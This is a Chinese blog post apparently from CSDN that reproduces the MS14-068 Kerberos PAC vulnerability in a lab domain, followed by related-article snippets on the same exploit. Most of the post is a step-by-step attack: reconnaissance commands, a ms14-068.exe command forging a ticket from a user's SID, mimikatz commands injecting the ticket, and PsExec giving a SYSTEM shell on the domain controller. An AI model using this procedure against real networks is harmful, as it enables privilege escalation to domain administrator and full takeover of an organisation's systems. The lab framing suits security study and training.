MS14-068(域提权)漏洞复现

最新推荐文章于 2024-04-24 11:33:24 发布
最新推荐文章于 2024-04-24 11:33:24 发布
阅读量746 收藏 3
点赞数
分类专栏: 漏洞复现 内网 文章标签: 运维 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50985113/article/details/131460438
版权

这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。
该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC 。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限

该漏洞在windows server2012环境的域控中可能会发生报错

环境信息

windows server2008 R2(域控):192.168.197.4
windows 7(成员机):192.168.197.133

查看本地主机信息

使用域内主机域内普通用户登录

net config workstation

image.png

查看域管主机信息
nltest /dsgetdc:

image.png

查看本地是否打补丁
systeminfo |find "3011780"

返回空证明没打补丁
image.png

本地访问测试
dir \\WIN-S50F8HMOEBD.dc1.com\c$

image.png

查看用户信息
whoami -user

image.png

使用ms14-068伪造票据:
ms14-068.exe -u test@dc1.com -p 123 -s S-1-5-21-3698873215-1888486255-1844816113-1107 -d WIN-S50F8HMOEBD.dc1.com

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址
image.png
生成对应文件
image.png

使用mimikatz来清除和写入凭证
kerberos::purge			//清除凭证
kerberos::ptc  票据地址

image.png
image.png

再次链接后不会拒绝

dir \\WIN-S50F8HMOEBD.dc1.com\c$

image.png

反弹shell
PsExec64.exe /accepteula /s \\WIN-S50F8HMOEBD.dc1.com cmd

系统权限
image.png
域管IP
image.png

当域控是windows server2012时

会有以下拦截,不知道是什么情况
image.png

阿文、...
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ms14-068.exe内神器
11-25
【标题】"ms14-068.exe内神器" 涉及的主要知识点是Microsoft在2014年发布的安全更新公告MS14-068,它与Windows操作系统中的Kerberos认证漏洞有关。这个漏洞允许攻击者通过精心构造的请求,绕过控制器的安全验证...
pykek-ms14-068.zip
01-06
标签“pykek-ms14-068.z”进一步强化了这个主题,暗示了内容与pykek工具和MS14-068漏洞有关。然而,标签中的".z"可能是一个错误,因为通常的文件扩展名是".zip",这可能是压缩文件的一部分。 在压缩包内的文件...
MS14-068 (CVE-2014-6324)用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7338
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个内的普通账户可以利用此漏洞进行权限提升,升级为管理员权限。 二、漏洞原理 Kerberos认证原理:http
提权MS14-068
good good study
03-17 4686
目标:普通成员——>管理员 漏洞利用前提 控没有打MS14-068的补丁(KB3011780) 拿下一台加入的计算机 有这台内计算机的用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 控,开启了防火墙 win7(192.168.10.5),成员 1. win7获取账户的密码及sid值 win7机器上查看管理员,可发现,并没有自己 这里使用mimikatz去抓取用户的明文密码 mimikatz.exe "privilege:....
MS14-064/CVE-2014-6332漏洞复现(OLE远程代码执行漏洞、IE浏览器漏洞
最新发布
m0_74168970的博客
04-24 378
MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码。show options:查看需要设置的地方。
复现MS14-068
这里是Y.lin的博客,目前是一名网络安全专业的学生,希望和师傅们一起进步吧!
05-23 573
MS14-068
MS14-068渗透
bailandawang123的博客
03-10 443
ms14068主要是通过伪造管的tgt,将普通用户提升为管用户,从而控制控。
MS14-068漏洞复现
一纸荒芜的博客
08-26 3232
ms14-068漏洞复现
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2376
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
MS14-068AD提权神器
05-24
1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号...
ms14-068利用工具包.zip
07-01
"minikataz"是一个提及的64位程序,很可能是一个轻量级的Kerberos模拟环境或测试工具,用于在安全环境中复现MS14-068漏洞。它可能帮助研究人员或安全专家在受控环境下理解漏洞的工作原理,测试修复措施,或者验证...
MS14-058提权神器
09-24
MS14-058 提权 windows提权
漏洞验证系列--MS14-066
shengerjianku的专栏
10-12 5459
本系列文章旨在对于有一定网络安全基础的人员,在日常工作中扫描出来的各种漏洞,如何进行验证,以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。 1.安装winshock工具 cd /usr/local/tools/ git clone https://github.com/anexia-it/winshock-test.git #使用方法 cd winshock-test ./winshock...
Windows控常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 2611
本文对近几年出现的Windows控相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
MS14-066漏洞测试工具
iteye_16188的博客
11-22 7366
工具地址:[url]https://github.com/anexia-it/winshock-test[/url] 下载方法:[code="java"]git clone https://github.com/anexia-it/winshock-test.git[/code] 扫描原理:根据扫描支持的4中密码来判断是否有漏洞漏洞原理:[url]http://www.freebuf.c...
控安全之渗透
m0_59598029的博客
02-25 612
在通常情况下、即使拥有管理员权限,也无法读取控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为控制器的。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。
MS14-068
xiaoxuetu_的博客
07-29 905
危害: 允许攻击者将非特权的用户帐户权限提升为管理员帐户的权限。 MS14-068漏洞利用过程: 请求没有PAC作为标准用户的Kerberos TGT身份验证凭证,DC使用TGT进行回复(没有PAC通常包含组成员资格,这是不寻常的)。生成伪造的PAC,没有密钥,所以生成的PAC使用用户的密码数据使用MD5算法而不是HMAC_MD5“签名”。将无PAC的TGT发送到DC,将伪
MS14-068提权漏洞复现
WY92139010的博客
05-14 538
MS14-068提权漏洞复现 一、漏洞说明 改漏洞可能允许攻击者将未经授权的用户账户的权限,提权管理员的权限。 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 二、漏洞原理 Kerberos认证原理:ht...
ms14-068提权
zz_strive_2012的专栏
06-17 2447
一、利用mimakatz.exe来抓取用户的口令 (1)首先利用ms14-058来提权得到管理员权限 (2)利用mimikatz.exe抓密码 可见抓到的口令。用户zhangsan,口令password1! 二、利用ms14-068提权工具生成伪造的kerberos协议认证证书 dir可见缓存数据: 三、利用mimikatz.exe将证书写入,从而提
ms14-068漏洞实验
06-01
ms14-068 漏洞实验是一个模拟漏洞攻击的实验,旨在帮助安全研究人员、渗透测试人员和网络管理员更好地了解和防范该漏洞。该漏洞最初被发现于2014年,影响到了微软的 Windows 控制器。攻击者可以利用该漏洞来提升其在网络中的权限,包括在控制器上创建、修改和删除帐户。这是一种非常危险的漏洞,因此对其进行实验和研究是非常重要的。 通过进行 ms14-068 漏洞实验,您可以模拟攻击者如何利用该漏洞来进行攻击,并学习如何防范这种攻击。在实验中,您将使用一些工具和技术,如 Metasploit,来模拟攻击和测试防御措施。在完成实验后,您将能够更好地了解该漏洞的工作原理,如何检测该漏洞以及如何防御该漏洞。 总之,ms14-068 漏洞实验是一种非常有用的方式,可以帮助您提高网络安全意识和技能,保护您的网络免受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值